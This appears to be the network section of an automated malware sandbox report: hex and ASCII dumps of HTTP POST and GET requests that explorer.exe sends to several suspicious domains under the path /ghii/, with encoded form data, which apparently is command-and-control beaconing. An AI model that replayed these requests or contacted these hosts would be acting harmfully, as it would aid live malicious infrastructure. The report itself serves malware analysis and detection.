                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.749724184.94.215.9180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:42:52.480922937 CET333OUTPOST /ghii/ HTTP/1.1
                                                Host: www.energybig.xyz
                                                Connection: close
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Origin: http://www.energybig.xyz
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.energybig.xyz/ghii/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 78 4d 6a 6e 66 4e 2d 59 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 52 31 65 48 6f 7e 71 52 4c 41 79 4e 4d 4c 62 54 39 6e 7a 43 4b 55 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: xMjnfN-Y=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(R1eHo~qRLAyNMLbT9nzCKU.
                                                Feb 15, 2023 08:42:52.809778929 CET334INHTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:42:52 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                Feb 15, 2023 08:42:52.809811115 CET335INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                Feb 15, 2023 08:42:52.809828997 CET337INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                Feb 15, 2023 08:42:52.809843063 CET338INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                Feb 15, 2023 08:42:52.809859037 CET338INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.749725184.94.215.9180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:42:55.179994106 CET339OUTGET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2 HTTP/1.1
                                                Host: www.energybig.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 15, 2023 08:42:55.435777903 CET340INHTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:42:55 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                Feb 15, 2023 08:42:55.435914040 CET342INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                Feb 15, 2023 08:42:55.435950994 CET343INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                Feb 15, 2023 08:42:55.435983896 CET344INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                Feb 15, 2023 08:42:55.436012983 CET345INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.74972766.96.162.14980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:43:00.676424980 CET353OUTPOST /ghii/ HTTP/1.1
                                                Host: www.genuineinsights.cloud
                                                Connection: close
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Origin: http://www.genuineinsights.cloud
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.genuineinsights.cloud/ghii/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 78 4d 6a 6e 66 4e 2d 59 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 63 46 67 73 38 36 47 74 52 57 65 78 52 7a 6a 59 38 75 49 43 55 30 55 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: xMjnfN-Y=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8AkcFgs86GtRWexRzjY8uICU0U.
                                                Feb 15, 2023 08:43:00.794483900 CET354INHTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:43:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 867
                                                Connection: close
                                                Server: Apache/2
                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                Accept-Ranges: bytes
                                                Age: 0
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
